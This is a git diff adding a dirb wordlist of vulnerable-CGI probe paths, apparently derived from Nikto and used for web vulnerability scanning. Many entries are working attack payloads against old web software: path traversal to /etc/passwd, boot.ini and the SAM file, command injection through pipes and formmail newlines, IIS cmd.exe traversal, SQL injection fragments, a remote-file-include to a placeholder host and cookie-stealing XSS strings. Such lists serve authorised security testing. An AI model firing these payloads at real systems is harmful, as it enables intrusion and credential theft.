diff options
Diffstat (limited to 'wordlists/dirb/vulns/cgis.txt')
| -rw-r--r-- | wordlists/dirb/vulns/cgis.txt | 3494 |
1 files changed, 3494 insertions, 0 deletions
diff --git a/wordlists/dirb/vulns/cgis.txt b/wordlists/dirb/vulns/cgis.txt new file mode 100644 index 0000000..54cc3a5 --- /dev/null +++ b/wordlists/dirb/vulns/cgis.txt @@ -0,0 +1,3494 @@ +TiVoConnect?Command=QueryServer +TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes +cgi-bin/cart32.exe +cgi-bin/classified.cgi +cgi-bin/download.cgi +cgi-bin/flexform.cgi +cgi-bin/flexform +cgi-bin/lwgate.cgi +cgi-bin/LWGate.cgi +cgi-bin/lwgate +cgi-bin/LWGate +cgi-bin/perlshop.cgi +cfappman/index.cfm +cfdocs/examples/cvbeans/beaninfo.cfm +cfdocs/examples/parks/detail.cfm +kboard/ +lists/admin/ +splashAdmin.php +ssdefs/ +sshome/ +tiki/ +tiki/tiki-install.php +scripts/samples/details.idc +_vti_bin/shtml.exe +cgi-bin/handler.cgi +cgi-bin/finger +cgi-bin/finger.pl +cgi-bin/formmail.cgi +cgi-bin/formmail.pl +cgi-bin/formmail +cgi-bin/get32.exe +cgi-bin/gm-authors.cgi +cgi-bin/guestbook/passwd +cgi-bin/horde/test.php?mode=phpinfo +cgi-bin/photo/protected/manage.cgi +cgi-bin/wrap.cgi +./ +~root/ +cgi-bin/wrap +forums/@ADMINconfig.php +forums/config.php +ganglia/ +guestbook/guestbookdat +guestbook/pwd +help/ +hola/admin/cms/htmltags.php?datei=./sec/data.php +horde/imp/test.php +horde/test.php?mode=phpinfo +imp/horde/test.php?mode=phpinfo +imp/horde/test.php +index.html.bak +index.html~ +index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc +global.inc +cgi-bin/formmail.pl +cgi-bin/horde/test.php +inc/common.load.php +inc/config.php +inc/dbase.php +cgi-bin/visadmin.exe +cgi-bin/html2chtml.cgi +cgi-bin/html2wml.cgi +cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00 +cgi-bin/echo.bat?&dir+c:\ +cgi-bin/excite;IFS=\"$\";/bin/cat +cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd| +cgi-bin/guestbook.cgi +cgi-bin/guestbook.pl +cgi-bin/ss +forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\" +guestbook/guestbook.html +html/cgi-bin/cgicso?query=AAA +geeklog/users.php +gb/index.php?login=true +guestbook/admin.php +cgi-bin/gH.cgi +cgi-bin/gm-cplog.cgi +getaccess +help.html +cgi-bin/gm.cgi +filemanager/filemanager_forms.php +cgi-bin/AT-admin.cgi +cgi-bin/auth_data/auth_user_file.txt +cgi-bin/awstats.pl +cgi-bin/awstats/awstats.pl +cgi-bin/blog/mt.cfg +cgi-bin/cart.pl?db=' +cgi-bin/cart.pl?db=' +cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= +cgi-bin/mt-static/mt-check.cgi +cgi-bin/mt/mt-check.cgi +cfdocs/expeval/openfile.cfm +index.php/123 +mambo/index.php?Itemid=JUNK(5) +profile.php?u=JUNK(8) +ticket.php?id=99999 +vgn/login/1,501,,00.html?cookieName=x--\> +a%5c.aspx +cgi-bin/banner.cgi +cgi-bin/bannereditor.cgi +cgi-bin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 +admin/browse.asp?FilePath=c:\&Opt=2&level=0 +cgi-bin/architext_query.pl +cgi-bin/bizdb1-search.cgi +cgi-bin/blog/ +tsweb/ +cgi-bin/blog/mt-load.cgi +cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/ +vgn/performance/TMT +vgn/performance/TMT/Report +vgn/performance/TMT/Report/XML +vgn/performance/TMT/reset +vgn/ppstats +vgn/previewer +vgn/record/previewer +vgn/stylepreviewer +vgn/vr/Deleting +vgn/vr/Editing +vgn/vr/Saving +vgn/vr/Select +scripts/iisadmin/bdir.htr +scripts/iisadmin/ism.dll +scripts/tools/ctss.idc +bigconf.cgi +billing/billing.apw +blah_badfile.shtml +blah-whatever-badfile.jsp +vgn/style +scripts/no-such-file.pl +SiteServer/Admin/commerce/foundation/domain.asp +SiteServer/Admin/commerce/foundation/driver.asp +SiteServer/Admin/commerce/foundation/DSN.asp +SiteServer/admin/findvserver.asp +SiteServer/Admin/knowledge/dsmgr/default.asp +cgi-bin/cgiwrap/%3Cfont%20color=red%3E +cgi-bin/moin.cgi?test +autologon.html?10514 +basilix/mbox-list.php3 +basilix/message-read.php3 +clusterframe.jsp +IlohaMail/blank.html +bb-dnbd/faxsurvey +cartcart.cgi +scripts/Carello/Carello.dll +scripts/tools/dsnform.exe +scripts/tools/dsnform +SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp +SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp +prd.i/pgen/ +readme.eml +scripts/httpodbc.dll +scripts/proxy/w3proxy.dll +scripts/root.exe?/c+dir+c:\+/OG +SiteServer/admin/ +siteseed/ +scripts/samples/search/author.idq +scripts/samples/search/filesize.idq +scripts/samples/search/filetime.idq +scripts/samples/search/queryhit.idq +scripts/samples/search/simple.idq +pccsmysqladm/incs/dbconnect.inc +iisadmin/ +password.inc +PDG_Cart/oder.log +web-console/ServerInfo.jsp%00 +global.asa +exchange/lib/AMPROPS.INC +exchange/lib/DELETE.INC +exchange/lib/GETREND.INC +exchange/lib/GETWHEN.INC +exchange/lib/JSATTACH.INC +exchange/lib/JSROOT.INC +exchange/lib/JSUTIL.INC +exchange/lib/LANG.INC +exchange/lib/logon.inc +exchange/lib/PAGEUTIL.INC +exchange/lib/PUBFLD.INC +exchange/lib/RENDER.INC +exchange/lib/SESSION.INC +ows/restricted%2eshow +WEB-INF./web.xml +view_source.jsp +w-agora/ +vider.php3 +exchange/root.asp?acs=anon +officescan/cgi/cgiChkMasterPwd.exe +%NETHOOD%/ +cgi-bin/astrocam.cgi +cgi-bin/badmin.cgi +cgi-bin/boozt/admin/index.cgi?section=5&input=1 +cgi-bin/ezadmin.cgi +cgi-bin/ezboard.cgi +cgi-bin/ezman.cgi +cgi-bin/foxweb.dll +cgi-bin/foxweb.exe +cgi-bin/mgrqcgi +cgi-bin/wconsole.dll +cgi-bin/webplus.exe?about +pbserver/pbserver.dll +administrator/gallery/uploadimage.php +pafiledb/includes/team/file.php +phpEventCalendar/file_upload.php +servlet/com.unify.servletexec.UploadServlet +cgi-win/uploader.exe +scripts/cpshost.dll +scripts/repost.asp +upload.asp +uploadn.asp +uploadx.asp +wa.exe +basilix/compose-attach.php3 +server/ +cgi-bin/fpsrvadm.exe +siteminder/smadmin.html +vgn/ac/data +vgn/ac/delete +vgn/ac/edit +vgn/ac/esave +vgn/ac/fsave +vgn/ac/index +vgn/asp/MetaDataUpdate +vgn/asp/previewer +vgn/asp/status +vgn/asp/style +vgn/errors +vgn/jsp/controller +vgn/jsp/errorpage +vgn/jsp/initialize +vgn/jsp/jspstatus +vgn/jsp/jspstatus56 +vgn/jsp/metadataupdate +vgn/jsp/previewer +vgn/jsp/style +vgn/legacy/edit +vgn/login +webtop/wdk/samples/index.jsp +cgi-bin/.cobalt +WEB-INF/web.xml +forum/admin/wwforum.mdb +fpdb/shop.mdb +guestbook/admin/o12guest.mdb +midicart.mdb +MIDICART/midicart.mdb +mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb +news/news.mdb +newuser?Image=../../database/rbsserv.mdb +shopdbtest.asp +shopping300.mdb +shopping400.mdb +shoppingdirectory/midicart.mdb +SilverStream/Meta/Tables/?access-mode=text +database/db2000.mdb +cgi-bin/mailit.pl +cgi-bin/search +doc/webmin.config.notes +error/HTTP_NOT_FOUND.html.var +oem_webstage/cgi-bin/oemapp_cgi +ADMINconfig.php +cgi-bin/.access +cgi-bin/%2e%2e/abyss.conf +cgi-bin/data/fetch.php?page= +cgi-bin/empower?DB=whateverwhatever +cgi-bin/mrtg.cgi?cfg=blah +cgi-bin/store/agora.cgi?page=whatever33.html +?mod=node&nid=some_thing&op=view +?mod=some_thing&op=browse +article.php?article=4965&post=1111111111 +blah123.php +categorie.php3?cid=june +CFIDE/probe.cfm +contents.php?new_language=elvish&mode=select +download.php?op=viewdownload +download.php?op=viewdownload +examples/basic/servlet/HelloServlet +home.php?arsc_language=elvish +hostadmin/?page=' +hostadmin/?page=' +index.php?file=index.php +jgb_eng_php3/cfooter.php3 +JUNK(5).csp +modules.php?name=Downloads&d_op=viewdownload +modules.php?name=Downloads&d_op=viewdownload +modules.php?op=modload&name=0&file=0 +modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid= +modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink +path/nw/article.php?id=' +path/nw/article.php?id=' +pw/storemgr.pw +rtm.log +scozbook/view.php?PG=whatever +servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter +shopa_sessionlist.asp +simplebbs/users/users.php +sips/sipssys/users/a/admin/user +tcb/files/auth/r/root +typo3conf/ +typo3conf/database.sql +typo3conf/localconf.php +vchat/msg.txt +vgn/license +web.config +webamil/test.php?mode=phpinfo +webcart-lite/config/import.txt +webcart-lite/orders/import.txt +webcart/carts/ +webcart/config/ +webcart/config/clients.txt +webcart/orders/ +webcart/orders/import.txt +webmail/horde/test.php +whateverJUNK(4).html +ws_ftp.ini +WS_FTP.ini +cgi-bin/MsmMask.exe +_mem_bin/auoconfig.asp +_mem_bin/auoconfig.asp +_mem_bin/remind.asp +exchange/lib/ATTACH.INC +SiteServer/Admin/knowledge/persmbr/vs.asp +SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp +SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp +SiteServer/Admin/knowledge/persmbr/VsTmPr.asp +trace.axd +tvcs/getservers.exe?action=selects1 +whatever.htr +whatever.htr +./ +nsn/fdir.bas:ShowVolume +nsn/fdir.bas +servlet/webacc?User.html=noexist +forum/admin/database/wwForum.mdb +webmail/blank.html +jamdb/ +cgi/cgiproc? +cgi-bin/addbanner.cgi +cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd +cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd +cgi-bin/shtml.dll +admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv +cgi-bin/aglimpse.cgi +cgi-bin/aglimpse +cgi-bin/architext_query.cgi +cgi-local/cgiemail-1.4/cgicso?query=AAA +cgi-local/cgiemail-1.6/cgicso?query=AAA +servlet/SchedulerTransfer +servlet/sunexamples.BBoardServlet +servlets/SchedulerTransfer +cgi-bin/cmd.exe?/c+dir +cgi-bin/cmd1.exe?/c+dir +cgi-bin/hello.bat?&dir+c:\ +cgi-bin/post32.exe|dir%20c:\ +perl/-e%20print%20Hello +admin.cgi +interscan/ +vgn/legacy/save + +IDSWebApp/IDSjsp/Login.jsp +quikstore.cfg +quikstore.cgi +securecontrolpanel/ +siteminder +webmail/ +Xcelerate/LoginPage.html +_cti_pvt/ +smg_Smxcfg30.exe?vcc=3560121183d3 +examples/servlets/index.html +nsn/..%5Cutil/attrib.bas +nsn/..%5Cutil/chkvol.bas +nsn/..%5Cutil/copy.bas +nsn/..%5Cutil/del.bas +nsn/..%5Cutil/dir.bas +nsn/..%5Cutil/dsbrowse.bas +nsn/..%5Cutil/glist.bas +nsn/..%5Cutil/lancard.bas +nsn/..%5Cutil/md.bas +nsn/..%5Cutil/rd.bas +nsn/..%5Cutil/ren.bas +nsn/..%5Cutil/send.bas +nsn/..%5Cutil/set.bas +nsn/..%5Cutil/slist.bas +nsn/..%5Cutil/type.bas +nsn/..%5Cutil/userlist.bas +nsn/..%5Cweb/env.bas +nsn/..%5Cweb/fdir.bas +nsn/..%5Cwebdemo/env.bas +nsn/..%5Cwebdemo/fdir.bas +wikihome/action/conflict.php +cgi-bin/archie +cgi-bin/calendar.pl +cgi-bin/calendar +cgi-bin/date +cgi-bin/fortune +cgi-bin/redirect +cgi-bin/uptime +cgi-bin/wais.pl +/ +webtop/wdk/ +SilverStream +signon +upd/ +examples/jsp/source.jsp?? +lpt9 +cfcache.map +cfdocs/cfcache.map +CVS/Entries +lpt9.xtp +mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc +PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc +asp/sqlqhit.asp +asp/SQLQHit.asp +iissamples/issamples/sqlqhit.asp +iissamples/issamples/SQLQHit.asp +ISSamples/sqlqhit.asp +ISSamples/SQLQHit.asp +junk.aspx +oc/Search/sqlqhit.asp +oc/Search/SQLQHit.asp +search/htx/sqlqhit.asp +search/htx/SQLQHit.asp +search/sqlqhit.asp +search/SQLQHit.asp +sqlqhit.asp +SQLQHit.asp +cgi-bin/com5................................................................................................................................................................................................... +cgi-bin/com5.java +cgi-bin/com5.pl +?Open +?OpenServer +catalog.nsf +cersvr.nsf +cgi-bin/testing_whatever +domlog.nsf +events4.nsf +log.nsf +names.nsf +LOGIN.PWD +USER/CONFIG.AP +cgi-bin/mail +cgi-bin/nph-error.pl +cgi-bin/post-query +cgi-bin/query +cgi-bin/test-cgi.tcl +cgi-bin/test-env +.perf + + +/ +admin-serv/config/admpw +test.php%20 +*.* +cgi-bin/cgi_process +ht_root/wwwroot/-/local/httpd$map.conf +JUNK(10) +local/httpd$map.conf +tree +cgi-bin/index.js0x70 +%00/ +%00/ +%00/ +%2e/ +%2e/ +%2e/ +%2f/ +%2f/ +%2f/ +%5c/ +%5c/ +%5c/ +index.jsp%00x +weblogic +%a%s%p%d +index.html%20 +852566C90012664F +hidden.nsf +mail.box +open? +setup.nsf +statrep.nsf +webadmin.nsf +cgi-bin/cgitest.exe +examples/servlet/AUX +cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html +cfdocs/cfmlsyntaxcheck.cfm +Config1.htm +contents/extensions/asp/1 +WebAdmin.dll?View=Logon +cgi-bin/Pbcgi.exe +cgi-bin/testcgi.exe +cgi-win/cgitest.exe +%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd +c/winnt/system32/cmd.exe?/c+dir+/OG +cgi-bin/snorkerz.bat +cgi-bin/snorkerz.cmd +msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c +msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c +msadc/samples/adctest.asp +JUNK(10) +nikto.ida +SUNWmc/htdocs/ +cgi-bin/webfind.exe?keywords=01234567890123456789 +cgi-shl/win-c-sample.exe +examples/servlet/TroubleShooter +cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah +cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah +goform/CheckLogin?login=root&password=tslinux +[SecCheck]/..%2f../ext.ini +[SecCheck]/..%255c..%255c../ext.ini +[SecCheck]/..%252f..%252f../ext.ini +cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini +cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini +.nsf/../winnt/win.ini +prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini +query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini +iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini +iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini +default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +................../config.sys +cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini +cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini +cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini +netget?sid=user&msg=300&file=../../../../../../../../../boot.ini +netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd +php/php.exe?c:\winnt\boot.ini +phpping/index.php?pingto=www.test.com%20|%20dir%20c:\ +scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini +us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini +wx/s.dll?d=/boot.ini +cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 +%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini +servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00 +cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3 +cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3 +cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ +cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\, +cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ +cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ +ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\ +php/php.exe?c:\boot.ini +../../../../../../../../../boot.ini +../../../../winnt/repair/sam._ +..\\..\\..\\..\\..\\..\\..\\boot.ini +//etc/passwd +//etc/hosts +///./../.../boot.ini +.cobalt/sysManage/../admin/.htaccess +albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd +autohtml.php?op=modload&mainfile=x&name=/etc/passwd +atomicboard/index.php?location=../../../../../../../../../../etc/passwd +current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 +current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 +dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00 +DomainFiles/*//../../../../../../../../../../etc/passwd +docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini +ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1 +index.php?download=/winnt/win.ini +index.php?download=/windows/win.ini +index.php?download=/etc/passwd +index.php?|=../../../../../../../../../etc/passwd +index.php?page=../../../../../../../../../../etc/passwd +index.php?page=../../../../../../../../../../boot.ini +index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd +jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd +jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini +k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor +nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0 +nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0 +phprocketaddin/?page=../../../../../../../../../../boot.ini +phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd +phpwebfilemgr/index.php?f=../../../../../../../../../etc +phptonuke.php?filnavn=/etc/passwd +put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd +ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00 +support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd +viewpage.php?file=/etc/passwd +Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html +webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif +webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif +cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd +cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd +cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd +cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd +cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd +cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters= +cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd +cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd +cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd +cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd +cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html +cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00 +cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00 +cgi-bin/db4web_c/dbdirname//etc/passwd +cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00 +cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 +cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 +cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 +cgi-bin/faxsurvey?cat%20/etc/passwd +cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 +cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 +cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test +cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test +cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 +cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 +cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 +cgi-bin/htmlscript?../../../../../../../../../../etc/passwd +cgi-bin/htgrep?file=index.html&hdr=/etc/passwd +cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 +cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd +cgi-bin/sbcgi/sitebuilder.cgi +cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd +cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd +cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd +cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 +cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 +cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini +cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd +cgi-bin/htsearch?exclude=%60/etc/passwd%60 +cgi-bin/shop.cgi?page=../../../../../../../etc/passwd +cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd +cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc +cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00 +cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini +cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini +cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= +cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10 +cgi-bin/php.cgi?/etc/passwd +cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd +cgi-bin/opendir.php?/etc/passwd +cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 +cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd +cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd +cgi-bin/multihtml.pl?multi=/etc/passwd%00html +cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd +cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00 +cgi-bin/way-board.cgi?db=/etc/passwd%00 +cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00 +cgi-bin/viewsource?/etc/passwd +cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd +cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd +cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd +cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 +cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00 +cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00 +cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd +cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html +cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd +cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00 +cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd| +cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd +servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00 +webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd +logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00| +cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 +page.cgi?../../../../../../../../../../etc/passwd +edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd +base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1 +cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00 +cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00 +cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd +cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd +cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd +cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd +cgi-bin/webplus?script=../../../../../../../../../../etc/passwd +cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 +athenareg.php?pass=%20;cat%20/etc/passwd +PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd +search?NS-query-pat=../../../../../../../../../../etc/passwd +search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini +..\..\..\..\..\..\temp\temp.class +../../../../../../../../../../etc/passwd +.../.../.../.../.../.../.../.../.../boot.ini +................../etc/passwd +%3f.jsp +%3f.jsp +%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini +%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd +%00 +ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini +ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd +ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini +admentor/adminadmin.asp +POSTNUKEMy_eGallery/public/displayCategory.php +cgi-bin/classifieds/index.cgi +imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x +userinfo.php?uid=1; +site/' +site/' +postnuke/index.php?module=My_eGallery +postnuke/html/index.php?module=My_eGallery +cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\, +phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month= +phpBB2/search.php?search_id=1\ +index.php?module=My_eGallery +author.asp +horde/test.php +imp/horde/test.php +cgi-bin/horde/test.php +examples/cookie +examples/session +themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script> +index.php?option=search&searchword=<script>alert(document.cookie);</script> +emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script> +emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script> +emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script> +administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script> +administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script> +administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script> +administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script> +administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script> +administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script> +index.php?dir=<script>alert('Vulnerable')</script> +https-admserv/bin/index?/<script>alert(document.cookie)</script> +clusterframe.jsp?cluster=<script>alert(document.cookie)</script> +article.cfm?id=1'<script>alert(document.cookie);</script> +upload.php?type=\"<script>alert(document.cookie)</script> +soinfo.php?\"><script>alert('Vulnerable')</script> +modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>; 